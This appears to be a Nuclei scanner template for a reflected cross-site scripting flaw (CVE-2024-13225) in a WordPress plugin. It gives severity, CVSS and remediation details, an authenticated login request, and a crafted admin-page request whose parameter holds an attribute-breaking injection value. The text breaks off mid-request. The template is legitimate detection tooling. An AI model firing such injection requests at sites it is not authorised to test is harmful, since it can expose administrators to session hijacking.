id: CVE-2024-13225
info:
name: ECT Home Page Products - Reflected XSS
author: Sourabh-Sahu
severity: medium
description: |
ECT Home Page Products WordPress plugin through 1.9 contains a reflected cross-site scripting caused by lack of sanitization and escaping of a parameter before outputting it in the page, letting attackers execute malicious scripts in the context of high privilege users such as admin, exploit requires victim to visit a maliciously crafted page.
impact: |
Attackers can execute malicious scripts in the context of high privilege users, potentially leading to session hijacking or account compromise.
remediation: |
Update to the latest version of the plugin where the vulnerability is fixed.
reference:
- https://wpscan.com/vulnerability/8efd7d62-3f74-4108-970e-bd5ed24914ff/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2024-13225
cwe-id: CWE-79
epss-score: 0.00594
epss-percentile: 0.45843
cpe: cpe:2.3:a:etemplates:ect_home_page_products:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 2
vendor: etemplates
product: ect_home_page_products
tags: cve,cve2024,etemplates,ect-home-page-products,authenticated,xss,wordpress,wp,wp-plugin
flow: http(1) && http(2)
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In&redirect_to=
matchers:
- type: dsl
dsl:
- contains(header, "wordpress_logged_in")
internal: true
- raw:
- |
GET /wp-admin/admin.php?page=ect_homepage_prod_add&_id=testxss">